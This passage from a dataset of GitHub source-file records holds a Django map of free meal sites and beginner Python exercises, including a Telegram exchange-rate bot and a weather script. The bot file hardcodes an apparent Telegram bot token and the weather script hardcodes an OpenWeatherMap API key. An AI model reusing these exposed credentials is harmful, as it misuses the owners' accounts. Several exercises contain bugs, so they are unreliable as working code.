"alpha_fraction": 0.5573770403862,
"alphanum_fraction": 0.5692167282104492,
"avg_line_length": 29.5,
"blob_id": "a367a4b1d44fb3f7ca85ba95b63ae6e9d304c689",
"content_id": "b6c2e39d73511765c8a0fb4d2a03833823028d8e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1190,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 36,
"path": "/booth/views.py",
"repo_name": "seosaju/SoupKitchen",
"src_encoding": "UTF-8",
"text": "from django.http import HttpResponse\nfrom django.shortcuts import render\nfrom load_csv import load\nfrom secret import MAP_KEY\nfrom .models import Booth, Company\n\n'''\ndef make_booth(request):\n booth_list = load('./data.csv')\n for booth in booth_list:\n name = booth[3]\n try:\n company = Company.objects.get(name=name)\n except Company.DoesNotExist:\n company = Company(name=name)\n company.save()\n Booth.objects.create(\n name=booth[0], # 시설명\n road_address=booth[1], # 소재지도로명주소\n land_address=booth[2], # 소재지지번주소\n company=company, # 운영기관명\n contact=booth[4], # 전화번호\n place=booth[5], # 급식장소\n target=booth[6], # 급식대상\n time=booth[7], # 급식시간\n date=booth[8], # 급식일\n latitude=booth[11], # 위도\n longitude=booth[12] # 경도\n )\n return HttpResponse('load complete!')\n'''\n\n\ndef maps(request):\n booths = Booth.objects.all()\n return render(request, 'booth/maps.html', {'booths': booths, 'MAP_KEY': MAP_KEY})\n"
},
{
"alpha_fraction": 0.6545454263687134,
"alphanum_fraction": 0.6545454263687134,
"avg_line_length": 23.44444465637207,
"blob_id": "2e667f8af5fc3e0eb66258b4f449e3cb88fb9e1b",
"content_id": "24698e7be40b24786737b3067039b1ca595eb43b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 244,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 9,
"path": "/booth/urls.py",
"repo_name": "seosaju/SoupKitchen",
"src_encoding": "UTF-8",
"text": "from django.urls import path\nfrom . import views\n\n\napp_name = 'booth'\nurlpatterns = [\n # path('make_booth/', views.make_booth, name='make_booth'), csv 파일 DB에 등록할 때만 사용하는 URL.\n path('', views.maps, name='index'),\n]\n"
},
{
"alpha_fraction": 0.648829460144043,
"alphanum_fraction": 0.6811594367027283,
"avg_line_length": 34.880001068115234,
"blob_id": "c243075cd4d37862b6f476f3cf774f46f89aba27",
"content_id": "511650e6762703ba78a253723bf57d211aa4554a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 989,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 25,
"path": "/booth/models.py",
"repo_name": "seosaju/SoupKitchen",
"src_encoding": "UTF-8",
"text": "from django.db import models\n\n\nclass Company(models.Model):\n name = models.CharField(max_length=100)\n\n def __str__(self):\n return self.name\n\n\nclass Booth(models.Model):\n name = models.CharField(max_length=50) # 시설명\n road_address = models.CharField(max_length=100) # 소재지도로명주소\n land_address = models.CharField(max_length=100) # 소재지지번주소\n company = models.ForeignKey('Company', on_delete=models.CASCADE) # 운영기관명\n contact = models.CharField(max_length=20) # 전화번호\n place = models.CharField(max_length=100) # 급식장소\n target = models.CharField(max_length=100) # 급식대상\n time = models.CharField(max_length=50) # 급식시간\n date = models.CharField(max_length=50) # 급식일\n latitude = models.DecimalField(max_digits=10, decimal_places=8) # 위도\n longitude = models.DecimalField(max_digits=11, decimal_places=8) # 경도\n\n def __str__(self):\n return self.name\n"
},
{
"alpha_fraction": 0.5736842155456543,
"alphanum_fraction": 0.6894736886024475,
"avg_line_length": 22.75,
"blob_id": "21ffd19ef4194537f42fca5a4da053a5ead80c19",
"content_id": "0693cf8ff4b08239761596a1ca32a678eb04d32e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 216,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 8,
"path": "/README.md",
"repo_name": "seosaju/SoupKitchen",
"src_encoding": "UTF-8",
"text": "## SoupKitchen 전국 무료 급식소 지도\n개발기간 2019.04.10 ~ 2019.04.17\n* Python 3.6\n* Django 2.2\n* Google Maps API\n---\n\n\n"
}
] | 6 |
Dmkop/Python_core | https://github.com/Dmkop/Python_core | ae1e3d358d24590842cf83d5953fae90d7128710 | cab02a8008576bfb1c75c83183441dcd2a7dfd95 | 3e8460dd2bf079e5bad9602bc4463f069173a49c | refs/heads/master | 2020-07-25T00:31:31.544048 | 2019-11-16T10:37:36 | 2019-11-16T10:37:36 | 208,099,474 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6860158443450928,
"alphanum_fraction": 0.6965699195861816,
"avg_line_length": 20.11111068725586,
"blob_id": "49958826b5aeeeb068791a0618efd7b274932d90",
"content_id": "3c554e011e6797404bc8ea4daf317ab6f4223be7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 379,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 18,
"path": "/18.09_task_5.py",
"repo_name": "Dmkop/Python_core",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3.6\n\n'''Consider an array of sheep where some sheep may be missing from their place. \nWe need a function that counts the number of sheep present in the array (true means present).'''\n\n\n\ndef count_sheeps(array):\n\tres = 0\n\tfor item in range(len(array)):\n\t\tif array[item]:\n\t\t\tres += 1\n\t\telse:\n\t\t\tcontinue\n\treturn res\n\n\nprint(count_sheeps([True, False, True, True]))"
},
{
"alpha_fraction": 0.6290983557701111,
"alphanum_fraction": 0.6803278923034668,
"avg_line_length": 31.600000381469727,
"blob_id": "9eee134be1b4514db2f987c67d02be3f1c573261",
"content_id": "2f5b61eb24754794ece5d02de419c03ab3dfb3ca",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 488,
"license_type": "no_license",
"max_line_length": 125,
"num_lines": 15,
"path": "/24.09_task_1.py",
"repo_name": "Dmkop/Python_core",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3.6\n\n'''Given an array of integers.\n\nReturn an array, where the first element is the count of positives numbers and the second element is sum of negative numbers.\n\nIf the input array is empty or null, return an empty array.'''\n\n#my_list = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, -11, -12, -13, -14, -15]\n\ndef check(val):\n\tpositive = [item for item in val if item > 0]\n\tnegative = [item for item in val if item < 0]\n\treturn len(positive), sum(negative)\nprint(list(check(my_list)))"
},
{
"alpha_fraction": 0.659841001033783,
"alphanum_fraction": 0.6726090312004089,
"avg_line_length": 24.943750381469727,
"blob_id": "ba0deffef3e9e888868c5bfa6f9d7c352f0c3ea7",
"content_id": "b50badf7c28846c83ef137e34134a919fbac447b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4860,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 160,
"path": "/Class_work_3.py",
"repo_name": "Dmkop/Python_core",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3.6\n\n'''1. Написати функцію, яка знаходить середнє арифметичне значення\n довільної кількості чисел.'''\n\ndef average_val(*args):\n\tmy_avg = sum(args) / len(args)\n\treturn my_avg\n\nprint(average_val(10, 12, 24))\n\n\n'''2. Написати функцію, яка повертає абсолютне значення числа'''\n\ndef absolute(arg):\n\tval = abs(numb)\n\treturn val\n\nnumb = int(input(\"Enter your number: \"))\nprint(absolute(numb))\n\n\n'''3. Написати функцію, яка знаходить максимальне число з двох чисел, \nа також в функції використати рядки документації DocStrings.'''\n\n\ndef max_val(num1, num2):\n\t\"\"\" This function return max value \"\"\"\n\tres = max(num1, num2)\n\treturn res\n\nprint(max_val(19, 20))\n\n\n\n\n'''4. Написати програму, яка обчислює площу прямокутника, \nтрикутника та кола (написати три функції для обчислення площі, \nі викликати їх в головній програмі в залежності від вибору користувача)'''\n\nfrom math import pi, sqrt, pow\n\ndef area_triangle(a, b, c):\n\tp = (a + b + c) / 2\n\tS = sqrt(p * (p - a) * (p - b) * (p - c))\n\treturn S\n\ndef area_rectangle(l, w):\n\tS = l * w\n\treturn S\n\ndef area_circle(R):\n\tS = pi * pow(R, 2)\n\treturn S\n\ndef main():\n\tfigure = input('hello, enter figure name for definition: ')\n\tif figure == 'triangle' or figure == 'трикутник':\n\t\tside1 = int(input('side a: '))\n\t\tside2 = int(input('side b: '))\n\t\tside3 = int(input('side c: '))\n\t\treturn area_triangle('%.5f' % side1, side2, side3)\n\n\telif figure == 'rectangle' or figure == 'rect' or figure == 'прямокутник':\n\t\tlength = int(input('enter rectangle length: '))\n\t\twidth = int(input('enter rectangle width: '))\n\t\treturn area_rectangle(length, width)\n\telif figure == 'circle' or figure == 'clc' or figure == 'круг':\n\t\tradius = int(input('enter circle radius: '))\n\t\treturn area_circle('%.5f' % radius)\n\telse:\n\t\treturn 'Figure ERROR, try again'\n\nprint(main())\n\n\n'''5. Написати функцію, яка обчислює суму цифр введеного числа.'''\n\ndef my_sum(num):\n\tres = 0\n\titem = list(num)\n\tfor index in range(len(item)):\n\t\tres += int(item[index])\n\treturn res\n\n\nuser_input = input('enter your data: ')\nwhile user_input:\n\tprint(my_sum(user_input))\n\tuser_input = input('enter your data: ')\n\n\n'''6. Написати програму калькулятор, яка складається з наступних функцій: \n\nголовної, яка пропонує вибрати дію та додаткових, які реалізовують вибрані дії, \nкалькулятор працює доти, поки ми не виберемо дію вийти з калькулятора, після виходу, \nкористувач отримує повідомлення з подякою за вибір нашого програмного продукту!!!'''\n\n\ndef addition(num1, num2):\n\tres = num1 + num2\n\treturn res\n\ndef subtraction(num1, num2):\n\tres = num1 - num2\n\treturn res\n\ndef multiplication(num1, num2):\n\tres = num1 * num2\n\treturn res\n\ndef division(num1, num2):\n\tres = num1 / num2\n\treturn res\n\ndef module (num1, num2):\n\tres = num1 % num2\n\treturn res\n\ndef main():\n\tprint('welcome to the application')\n\tprint('for adding click \"+\"')\n\tprint('for subtract click \"-\"')\n\tprint('for multiplication click \"*\"')\n\tprint('for division click \"/\"')\n\tprint('for module click \"%\"')\n\tresult = input('choosing the math operation: ')\n\twhile result:\n\n\t\tif result == 'addition' or result == '+':\n\t\t\tfirst_num = int(input('Enter the first digit: '))\n\t\t\tsecond_num = int(input('Enter the second digit: '))\n\t\t\treturn addition(first_num, second_num)\n\n\t\telif result == 'subtraction' or result == '-':\n\t\t\tfirst_num = int(input('Enter the first digit: '))\n\t\t\tsecond_num = int(input('Enter the second digit: '))\n\t\t\treturn subtraction(first_num, second_num)\n\n\t\telif result == 'multiplication' or result == '*':\n\t\t\tfirst_num = int(input('Enter the first digit: '))\n\t\t\tsecond_num = int(input('Enter the second digit: '))\n\t\t\treturn multiplication(first_num, second_num)\n\n\t\telif result =='division' or result == '/':\n\t\t\tfirst_num = int(input('Enter the first digit: '))\n\t\t\tsecond_num = int(input('Enter the second digit: '))\n\t\t\treturn division(first_num, second_num)\n\n\t\telif result == 'module' or result == '%':\n\t\t\tfirst_num = int(input('Enter the first digit: '))\n\t\t\tsecond_num = int(input('Enter the second digit: '))\n\t\t\treturn module(first_num, second_num)\n\n\t\telif result == 'exit':\n\t\t\treturn 'thank you for choosing our software'\n\n\t\telse:\n\t\t\treturn 'error, try again'\nprint(main())\n"
},
{
"alpha_fraction": 0.6760563254356384,
"alphanum_fraction": 0.679186224937439,
"avg_line_length": 22.703702926635742,
"blob_id": "80c08e5be2c27322c1fd7ca014ef85b79ac9c1e5",
"content_id": "408417b6991d45dfe6237578e0a47214467e5c33",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 639,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 27,
"path": "/revers_word.py",
"repo_name": "Dmkop/Python_core",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3.6\n\n\n'''You need to write a function that reverses the words in a given string.\n A word can also fit an empty string. If this is not clear enough, here are some examples:\n\nAs the input may have trailing spaces, you will also need to ignore unneccesary whitespace.'''\n\ntxt = input(\"Enter some words: \")\nmy_list = txt.split()\nmy_list.reverse()\n\nfor x in range(len(my_list)):\n\tprint(my_list[x], end=\" \")\n\n#FUNCTION\n\n\n# def revers(words):\n# \tmy_new_list = words.split()\n# \tmy_new_list.reverse()\n# \tfor item in range(len(my_new_list)):\n# \t\tprint(my_new_list[item], end = \" \")\n\n#txt = input(\"Enter some words: \")\n\n# revers(txt)"
},
{
"alpha_fraction": 0.6960486173629761,
"alphanum_fraction": 0.6994680762290955,
"avg_line_length": 34.58108139038086,
"blob_id": "05a075b0f5364dd81d60e2fc7f80d24af2c79373",
"content_id": "3755dff2a4405665ba74c856c968390df81b3416",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2632,
"license_type": "no_license",
"max_line_length": 137,
"num_lines": 74,
"path": "/exchange_bot.py",
"repo_name": "Dmkop/Python_core",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3.6\n\nimport telebot\nimport requests\nfrom telebot.types import Message\nfrom pprint import pprint\nfrom datetime import datetime\n\nTOKEN = '755209205:AAEuhzhXN0-hU-8K0DYXfs2woNU1qj7p4G0'\nYEAR = datetime.now().year\nMONTH = datetime.now().month\nDAY = datetime.now().day\nHOUR = datetime.now().hour\n\ndef privat_url():\n\tBASE_URL = f'https://api.privatbank.ua/p24api/exchange_rates?json&date={DAY}.{MONTH}.{YEAR}'\n\tdata = requests.get(BASE_URL)\n\treturn data.json()['exchangeRate']\n\n\nexchange_data = privat_url()\nbot = telebot.TeleBot(TOKEN)\npprint(exchange_data)\n#pprint(old_exchange_data)\n\[email protected]_handler(commands = ['start'])\ndef start(message: Message):\n\twith open('/home/dmkop/python_projects/SoftServe/My_project/Telebot/start', mode = 'r') as information:\n\t\ttxt_inf = information.read()\n\t\tbot.reply_to(message, txt_inf)\n\n\[email protected]_handler(commands = ['help'])\ndef help_data(message: Message):\n\twith open('/home/dmkop/python_projects/SoftServe/My_project/Telebot/help', mode = 'r') as help:\n\t\ttxt_help = help.read()\n\t\tbot.reply_to(message, txt_help)\n\n\[email protected]_handler(commands = ['info'])\ndef info_data(message: Message):\n\twith open('/home/dmkop/python_projects/SoftServe/My_project/Telebot/info', mode = 'r') as information:\n\t\ttxt_inf = information.read()\n\t\tbot.reply_to(message, txt_inf)\n\n\[email protected]_handler(content_types = ['text'])\[email protected]_message_handler(content_types = ['text'])\ndef currency_code(message: Message):\n\tfor item in range(1, len(exchange_data)):\n\n\t\tif message.text.upper() == exchange_data[item]['currency']:\n\n\t\t\tif message.text.upper() == 'EUR' or message.text.upper() == 'USD' or message.text.upper() == 'CHF' or message.text.upper() == 'CZK':\n\t\t\t\tbot.reply_to(message, 'The purchase rate equel: {purchase}\\n' \n\t\t\t\t' and the selling rate equel: {sale}'.format(purchase = exchange_data[item]['purchaseRate'], \n\t\t\t\tsale = exchange_data[item]['saleRate']))\n\t\t\t\treturn\n\n\t\t\telif message.text.upper() == 'CZK' or message.text.upper() == 'GBR' or message.text.upper() == 'PLZ' or message.text.upper() == 'RUB':\n\t\t\t\tbot.reply_to(message, 'The purchase rate equel: {purchase}\\n' \n\t\t\t\t' and the selling rate equel: {sale}'.format(purchase = exchange_data[item]['purchaseRate'], \n\t\t\t\tsale = exchange_data[item]['saleRate']))\n\t\t\t\treturn\n\n\t\t\telse:\n\t\t\t\tbot.reply_to(message, 'The purchase rate at the Ukrainian National Bank equal: {purchase:.2f}\\n '\n\t\t\t\t'and the selling rate at the Ukrainian National Bank equal: {sale:.2f}'.format(purchase = exchange_data[item]['purchaseRateNB'], \n\t\t\t\tsale = exchange_data[item]['saleRateNB']))\n\t\t\t\treturn\n\n\treturn bot.reply_to(message, \"I can't handle this data yet\")\n\nbot.polling(timeout=60)"
},
{
"alpha_fraction": 0.6724637746810913,
"alphanum_fraction": 0.6811594367027283,
"avg_line_length": 20.625,
"blob_id": "71971a1c2675b049d308b608f5266418d51ed98d",
"content_id": "c5e1167160f84b024a01defac165064b427deac7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 345,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 16,
"path": "/27.09_task3.py",
"repo_name": "Dmkop/Python_core",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3.6\n\n'''Given a string, you have to return a string in which each character (case-sensitive) is repeated once.'''\n\ndef double_char(txt):\n\tres = ''\n\tfor item in txt:\n\t\tres += item * 2\n\treturn res\n\n\n\nuser_input = input('Enter some word: ')\nwhile user_input:\n\tprint(double_char(user_input))\n\tuser_input = input('Enter some word: ')"
},
{
"alpha_fraction": 0.7432646751403809,
"alphanum_fraction": 0.7480190396308899,
"avg_line_length": 27.727272033691406,
"blob_id": "b1ff5d6d9721e751065f602d39836af91c802aed",
"content_id": "233aa9d28138d2f6ac503125418fd4473c26a61d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 631,
"license_type": "no_license",
"max_line_length": 127,
"num_lines": 22,
"path": "/03.10_task_2.py",
"repo_name": "Dmkop/Python_core",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3.6\n\n'''According to the creation myths of the Abrahamic religions, Adam and Eve were the first Humans to wander the Earth.\n\nYou have to do God's job. The creation method must return an array of length 2 containing objects (representing Adam and Eve). \nThe first object in the array should be an instance of the class Man. The second should be an instance of the class Woman. \nBoth objects have to be subclasses of Human. Your job is to implement the Human, Man and Woman classes'''\n\n\nclass Human():\n\tpass\n\nclass Man(Human):\n\tpass\n\nclass Woman(Human):\n\tpass\n\ndef God(*args):\n\treturn args\n\nprint(God('Adam', 'Eva'))"
},
{
"alpha_fraction": 0.6388888955116272,
"alphanum_fraction": 0.6845238208770752,
"avg_line_length": 27,
"blob_id": "8a2dcccbe8b926bb4af3c09b02cf6f12f3f14786",
"content_id": "2602dc5a705cbe0708d23e350b6de3225ba1a1cb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 504,
"license_type": "no_license",
"max_line_length": 132,
"num_lines": 18,
"path": "/24.09_task_3.py",
"repo_name": "Dmkop/Python_core",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3.6\n\n\n'''If we list all the natural numbers below 10 that are multiples of 3 or 5, we get 3, 5, 6 and 9. The sum of these multiples is 23.\n\nFinish the solution so that it returns the sum of all the multiples of 3 or 5 below the number passed in.\n\nNote: If the number is a multiple of both 3 and 5, only count it once.'''\n\n\ndef natural_numb(numbs):\n\tval = 0\n\tfor item in range(numbs):\n\t\tif item % 3 == 0 or item % 5 == 0:\n\t\t\tprint(item)\n\t\t\tval += item\n\treturn val\nprint(natural_numb(20))\n"
},
{
"alpha_fraction": 0.6306228637695312,
"alphanum_fraction": 0.6557093262672424,
"avg_line_length": 34.3979606628418,
"blob_id": "599999a7eb69d54967b6399d59065dea775a248c",
"content_id": "481d185d85f1a5502c12a5999172bf72d3a5e87b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4066,
"license_type": "no_license",
"max_line_length": 144,
"num_lines": 98,
"path": "/Class_work_4.py",
"repo_name": "Dmkop/Python_core",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3.6\n\n\nimport pyowm\n\n# Have a pro subscription? Then use:\n# owm = pyowm.OWM(API_key='your-API-key', subscription_type='pro')\n# Search for current weather in London (Great Britain)\n\n\nowm = pyowm.OWM('a7ab5ba60307b1edd5321a495d1a1658') # You MUST provide a valid API key\n#observation = owm.weather_at_place(input('Hello, enter some city: '))\ncity = input('What city you are interested: ')\nobservation = owm.weather_at_place(city)\nw = observation.get_weather()\n#print(w) # <Weather - reference time=2013-12-18 09:20,\n # status=Clouds>\n\nwind_speed = w.get_wind()['speed']\nwind_deg = w.get_wind()['deg']\nhumidity = w.get_humidity()\ntemperature = w.get_temperature('celsius')['temp']\ndetails = w.get_detailed_status()\nprint(f'In {city} city, is the temperature of the air {temperature} for the Celsius, wind speed = {wind_speed} km/h, humidity is {humidity} %')\nprint('Also in the city: {}'.format(details))\n# Weather details\nw.get_wind() # {'speed': 4.6, 'deg': 330}\nw.get_humidity() # 87\nw.get_temperature('celsius') # {'temp_max': 10.5, 'temp': 9.7, 'temp_min': 9.0}\n\n# Search current weather observations in the surroundings of\n# lat=22.57W, lon=43.12S (Rio de Janeiro, BR)\nobservation_list = owm.weather_around_coords(-22.57, -43.12)\n\n\n'''1. Напишіть скрипт-гру, яка генерує випадковим чином число з діапазону чисел від 1 до 100 і пропонує користувачу вгадати це число. \nПрограма зчитує числа, які вводить користувач і видає користувачу підказки про те чи загадане число більше чи менше за введене користувачем. \nГра має тривати до моменту поки користувач не введе число, яке загадане програмою, тоді друкує повідомлення привітання. \n(для виконання завдання необхідно імпортувати модуль random, а з нього функцію randint())'''\n\n\n# from random import randint\n\n\n# rand = randint(1, 100)\n# def game(rand_val):\n# \tuser_data = int(input('Enter your data: '))\n# \twhile user_data:\n# \t\tif user_data != rand_val:\n# \t\t\tif user_data < rand_val:\n# \t\t\t\tprint('Потрібно ввести більше число')\n# \t\t\telif user_data > rand_val:\n# \t\t\t\tprint('Потрібно ввести менше число')\n# \t\telse:\n# \t\t\tprint('You WIN')\n# \t\t\tbreak\n# \t\tuser_data = int(input('Enter your digit: '))\n\n# game(rand)\n\n\n'''2. Напишіть скрипт, який обчислює площу прямокутника a*b, площу трикутника 0.5*h*a, площу кола pi*r**2. \n(для виконання завдання необхідно імпортувати модуль math, а з нього функцію pow() та значення змінної пі)'''\n\n# from math import pi, sqrt, pow\n\n# def area_triangle(a, b, c):\n# \tp = (a + b + c) / 2\n# \tS = sqrt(p * (p - a) * (p - b) * (p - c))\n# \treturn S\n\n# def area_rectangle(l, w):\n# \tS = l * w\n# \treturn S\n\n# def area_circle(R):\n# \tS = pi * pow(R, 2)\n# \treturn S\n\n# def main():\n# \tfigure = input('hello, enter figure name for definition: ')\n# \tif figure == 'triangle' or figure == 'трикутник':\n# \t\tside1 = int(input('side a: '))\n# \t\tside2 = int(input('side b: '))\n# \t\tside3 = int(input('side c: '))\n# \t\treturn area_triangle('%.5f' % side1, side2, side3)\n\n# \telif figure == 'rectangle' or figure == 'rect' or figure == 'прямокутник':\n# \t\tlength = int(input('enter rectangle length: '))\n# \t\twidth = int(input('enter rectangle width: '))\n# \t\treturn area_rectangle(length, width)\n# \telif figure == 'circle' or figure == 'clc' or figure == 'круг':\n# \t\tradius = int(input('enter circle radius: '))\n# \t\treturn area_circle('%.5f' % radius)\n# \telse:\n# \t\treturn 'Figure ERROR, try again'\n\n# print(main())"
},
{
"alpha_fraction": 0.693989098072052,
"alphanum_fraction": 0.6994535326957703,
"avg_line_length": 33.375,
"blob_id": "2b67b7f5b6b1fa8d8419d0dde999ee236e5e566d",
"content_id": "e32c0b5ec441256e4f6cd79561d5b88594477d77",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 549,
"license_type": "no_license",
"max_line_length": 140,
"num_lines": 16,
"path": "/27.09_task2.py",
"repo_name": "Dmkop/Python_core",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3.6\n\n\n'''Your collegue wrote an simple loop to list his favourite animals. \nBut there seems to be a minor mistake in the grammar, which prevents the program to work. Fix it! :)\n\nIf you pass the list of your favourite animals to the function, you should get the list of the animals with orderings and newlines added.'''\n\nlist_animals = ['dog', 'cat', 'elephant']\n\ndef animals_list(my_lits):\n\tres = ''\n\tfor item in range(len(my_lits)):\n\t\tres += str(item + 1) + '. ' + my_lits[item] + '/n'\n\treturn res\nprint(animals_list(list_animals))"
},
{
"alpha_fraction": 0.6638298034667969,
"alphanum_fraction": 0.6893616914749146,
"avg_line_length": 18.66666603088379,
"blob_id": "9464a4da68b19d7b05a9e21a2b03a80e0a5ed8b5",
"content_id": "2c188d6064aee3342116e58af2af9e07ac24d5b5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 235,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 12,
"path": "/24.09_task_2.py",
"repo_name": "Dmkop/Python_core",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3.6\n\n'''In this kata you will create a function that takes in a list and returns a list with the reverse order.'''\n\n\nmy_list = [1, 2, 3, 4]\n\ndef revers_func(val):\n\tval.reverse()\n\treturn val\n\nprint(revers_func(my_list))"
},
{
"alpha_fraction": 0.49000000953674316,
"alphanum_fraction": 0.6200000047683716,
"avg_line_length": 11.625,
"blob_id": "7d3cc24b6a1c8f94875ec0da67e661cbf12bc21b",
"content_id": "44144497637ae5c24fb4b489c3ec21e81529944e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 100,
"license_type": "no_license",
"max_line_length": 31,
"num_lines": 8,
"path": "/lesson_3_task_3.py",
"repo_name": "Dmkop/Python_core",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3.6\n\nnumb_1 = 10\nnumb_2 = 5\n\nnumb_1, numb_2 = numb_2, numb_1\n\nprint(numb_1, numb_2)"
},
{
"alpha_fraction": 0.6875,
"alphanum_fraction": 0.6953125,
"avg_line_length": 20.41666603088379,
"blob_id": "c49f1fdd06bf5eb5ef76ffb84bcd084eb9825c78",
"content_id": "1ee46aa3218c1594b5007a9e7633196473a5e6ae",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 256,
"license_type": "no_license",
"max_line_length": 116,
"num_lines": 12,
"path": "/18.03_task_4.py",
"repo_name": "Dmkop/Python_core",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3.6\n\n'''Complete the method that takes a boolean value and return a \"Yes\" string for true, or a \"No\" string for false.'''\n\ndef convert(bool_val):\n\tif bool_val:\n\t\treturn 'Yes'\n\telse:\n\t\treturn 'No'\n\nprint(convert(True))\nprint(convert(False))"
},
{
"alpha_fraction": 0.6416763067245483,
"alphanum_fraction": 0.6751249432563782,
"avg_line_length": 25.020000457763672,
"blob_id": "75951bde6dffcbaff46679f6397ff205edc8c807",
"content_id": "c77fab66c71874a17ba96abccd08b19b4b8291dc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3554,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 100,
"path": "/Class_work.py",
"repo_name": "Dmkop/Python_core",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3.6\n\n'''1. Роздрукувати всі парні числа менші 100 (написати два варіанти коду:\n один використовуючи цикл while, а інший з використанням циклу for).'''\n\nnumb = 0\nwhile numb < 100:\n\tif numb % 2 == 0:\n\t\tprint(numb)\n\tnumb += 1\n\n\nfor numb1 in range(0, 100):\n\tif numb1 % 2 == 0:\n\t\tprint(numb1)\n\n\n'''2. Роздрукувати всі непарні числа менші 100. (написати два варіанти коду: \n\tодин використовуючи оператор continue, а інший без цього оператора).'''\n\n\nnumb2 = 0\nwhile numb2 < 100:\n\tif numb2 % 2 != 0:\n\t\tprint(numb2)\n\tnumb2 += 1\n\n\nfor numb3 in range(0, 100):\n\tif numb3 % 2 == 1:\n\t\tprint(numb3)\n\n'''3. Перевірити чи список містить непарні числа.\n (Підказка: використати оператор break)'''\n\n\nmy_list = [2, 4, 6, 8, 9, 10, 12]\nfor item in my_list:\n\tif item % 2 != 0:\n\t\tprint(\"Список містить непарне число %d\" % item)\n\t\tbreak\n\tprint(item)\n\n\n'''4. Створити список, який містить елементи цілочисельного типу, \nпотім за допомогою циклу перебору змінити тип даних елементів на числа з плаваючою крапкою. \n(Підказка: використати вбудовану функцію float ()).'''\n\nstop = int(input(\"numbers of list items: \"))\nmy_list = []\nfor item in range(stop):\n\tmy_list.append(input(\"Enter list data: \"))\nprint(my_list)\n\nfor res in range(len(my_list)):\n\tmy_list[res] = float(my_list[res])\nprint(my_list)\n\n'''5. Вивести числа Фібоначі включно до введеного числа n, використовуючи цикли.\n (Послідовність чисел Фібоначі 0, 1, 1, 2, 3, 5, 8, 13 і т.д.)'''\n\nstop = int(input(\"Enter iterations count: \"))\n\nfib1 = 0\nfib2 = 1\n\nfor res in range(stop):\n\tprint(fib2)\n\tfib1, fib2 = fib2, fib1 + fib2\n\n\n\n'''6. Створити список, що складається з чотирьох елементів типу string.\n Потім, за допомогою циклу for, вивести елементи по черзі на екран.'''\n\nwords = [\"h\", \"e\", \"l\", \"l\", \"o\"]\n\nfor elements in words:\n\tprint(elements)\n\n'''7. Змінити попередню програму так, щоб в кінці кожної букви елементів при виводі додавався певний символ,\n наприклад “#”. \n (Підказка: цикл for може бути вкладений в інший цикл, а також треба використати функцію print(“ ”, end=”%”)).'''\n\nwords = ['a', 'b', 's', 'd']\nfor item in words:\n\tprint(item, end='#')\n\tprint()\n\n'''8. Юзер вводить число з клавіатури, написати скріпт, який визначає чи це число просте чи складне.'''\n\nuser_data = int(input('enter some digit for verification: '))\nwhile user_data:\n\tif user_data == 1:\n\t\tprint(\"Число %d не є складним і не є простим\" % user_data)\n\telif user_data == 2 or user_data % 2 != 0:\n\t\tprint(\"Число {} є простим\".format(user_data))\n\telse:\n\t\tprint(f\"Число {user_data} є складеним\")\n\tuser_data = int(input('enter next digit for verification: '))"
},
{
"alpha_fraction": 0.6340121030807495,
"alphanum_fraction": 0.6521739363670349,
"avg_line_length": 26.96923065185547,
"blob_id": "4a1e1c1ccc8c6fa077176df3d4f5816b14ca6b21",
"content_id": "244b1087e04326a58348cb0c119915c67e039697",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2428,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 65,
"path": "/Class_work_2.py",
"repo_name": "Dmkop/Python_core",
"src_encoding": "UTF-8",
